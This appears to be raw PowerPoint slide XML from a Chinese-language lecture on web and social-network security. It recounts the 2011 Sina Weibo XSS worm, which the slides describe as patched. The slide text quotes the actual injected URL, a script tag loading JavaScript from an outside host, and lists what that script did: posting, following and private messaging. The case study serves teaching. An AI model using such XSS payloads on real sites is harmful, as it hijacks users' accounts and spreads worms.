            <a:ext cx="246884" cy="598539"/>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45" name="直接连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC52E36F-FF7A-2442-8F1F-120D8B0384D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="29" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6957418" y="3742688"/>
            <a:ext cx="246885" cy="32352"/>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48" name="直接连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADACF68-DEC9-E944-9C2B-F220016DAEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="30" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6957418" y="3742688"/>
            <a:ext cx="246885" cy="648940"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100"/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F4C4016-4199-0441-ACA6-D3E0BAB3DE78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739290" y="3272952"/>
            <a:ext cx="4050998" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网络应用的典型安全威胁 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>网络安全攻击的共性特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203848821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4.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>安全的机密性</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38078" y="1524231"/>
            <a:ext cx="9495451" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>日晚，新浪微博突然出现大规模的“微博病毒”，大量用户自动发送诸如：“郭美美事件的一些未注意到的细节”，“建党大业中穿帮的地方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>让女人心动的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>句诗歌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>这是传说中的神仙眷侣啊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>惊爆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>范冰冰艳照真流出了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>等等微博和私信，并自动关注一位名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hellosamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的用户。这场攻击事件的背后就是一次典型的针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>即（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>）中文名称为跨站脚本攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DCE6D8B-89F7-4341-891A-89757F24576D}"/>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094907" y="3307505"/>
            <a:ext cx="5416046" cy="3292475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97739935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4.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>安全的机密性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F4C4016-4199-0441-ACA6-D3E0BAB3DE78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870050" y="1225689"/>
            <a:ext cx="9495451" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>虽然新浪及时的修复了漏洞，但是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hellosamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>被封号之前约有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>30000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>名粉丝，也就是说有至少有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>30000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>名用户确实被感染过。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>整个的攻击流程如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、利用了新浪微博存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞，先使自己的微博“中毒”，在浏览器中加载如下地址即可：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>weibo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>即</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>weibo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/pub/star/g/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xyyyd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=//www.2kt.cn/images/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>t.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;&lt;/script&gt;? type=update</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、使用有道提供的短域名服务（这些网址目前已经“无害”）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>例如，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> http://163.fm/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PxZHoxn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，将链接指向：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>weibo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、当新浪登陆用户不小心访问到相关网页时，由于处于登录状态，会运行这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>脚本做几件事情：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>发微博，让更多的人看到这些消息，自然也就有更多人受害；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>b.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>加关注，加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2201270010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>关注，这应该就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hellosamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>发私信，给好友发私信传播这些链接；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389354504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4.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>安全的机密性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A946C4-0AE7-9C47-A5D0-72E4BFF56307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="70792" y="1653102"/>
            <a:ext cx="12192000" cy="4495693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392860087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4.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>安全的机密性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E0F500-C97D-A640-BC60-0B884AEF1643}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="58993" y="1004094"/>
            <a:ext cx="12192000" cy="5628525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38937778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4.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全的机密性 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DED8531-D365-1D47-AAB5-E0A3378C8234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458183" y="1633433"/>
            <a:ext cx="6096000" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>你自以为自己是一个可以独立思考的个体</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>但在掌握大数据的有心人面前</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>你就是一个可以被操控的棋子</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>你是否有这样的经历，想买个美容仪送给女朋友，或者想买双球鞋送给自己，于是上淘宝和京东搜索相关商品</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后你会惊讶的发现，当你在浏览其他网站或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的时候，居然会发现推荐给你的广告，就是你之前所浏览的商品</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>于是你会很惊讶，为什么这些网站或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>知道我想要什么？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其实你一点不必惊讶，因为这只是最最基础的对于大数据的运用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>讲白了就是你，被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>精准定位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93438D84-A518-6F47-ADEB-ACE4BB7B9C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0159" y="1340491"/>
            <a:ext cx="3638955" cy="201134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2856CDE1-AFA0-BF40-878E-EB42AE79C2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0561" y="3830399"/>
            <a:ext cx="3858149" cy="2239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9973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4.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全的机密性 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DED8531-D365-1D47-AAB5-E0A3378C8234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440484" y="1344365"/>
            <a:ext cx="6231685" cy="6463308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
